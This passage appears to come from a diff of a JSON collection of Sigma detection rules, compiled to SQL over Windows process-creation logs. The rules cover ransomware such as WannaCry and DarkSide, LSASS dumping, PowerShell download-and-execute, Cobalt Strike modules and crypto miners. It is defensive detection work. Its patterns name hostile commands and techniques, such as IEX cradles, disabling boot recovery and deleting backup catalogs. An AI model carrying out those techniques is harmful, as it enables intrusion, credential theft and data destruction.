OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE 